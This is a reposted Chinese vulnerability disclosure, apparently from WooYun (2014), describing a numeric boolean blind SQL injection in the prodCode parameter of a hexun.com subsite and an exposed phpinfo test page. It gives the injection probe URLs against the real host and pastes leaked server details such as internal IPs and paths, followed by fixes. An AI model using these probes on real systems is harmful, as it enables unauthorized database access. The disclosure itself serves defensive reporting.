记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

和讯网分站sql注入外加敏感信息泄露

2014-06-21 05:50

URL:

http://licaike.hexun.com/GjzDetail.action?prodCode=400008&prodType=S



其中prodCode存在问题



加个引号报错



数字型的bool盲注

http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=1&prodType=S



http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=2&prodType=S



假是一个服务器错误页面



另外该服务器同时支持php的解析,目测应该是LAMP的套件安装的。

就这样侧漏了



http://licaike.hexun.com/test.php



存在了phpinfo



PATH/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin

SERVER_SIGNATUREno value

SERVER_SOFTWAREApache/2.2.23 (Unix) PHP/5.3.23

SERVER_NAMElicaike.hexun.com

SERVER_ADDR10.2.21.22

SERVER_PORT80

REMOTE_ADDR10.3.2.22

DOCUMENT_ROOT/usr/local/apache2/htdocs

SERVER_ADMINyou@example.com

SCRIPT_FILENAME/usr/local/apache2/htdocs/test.php



漏洞证明:



111.png





222.png





333.png





数据

444.png

修复方案:

删除test.php文件



转换数字型

知识来源: www.wooyun.org/bugs/wooyun-2014-059715

阅读:83967 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“和讯网分站sql注入外加敏感信息泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词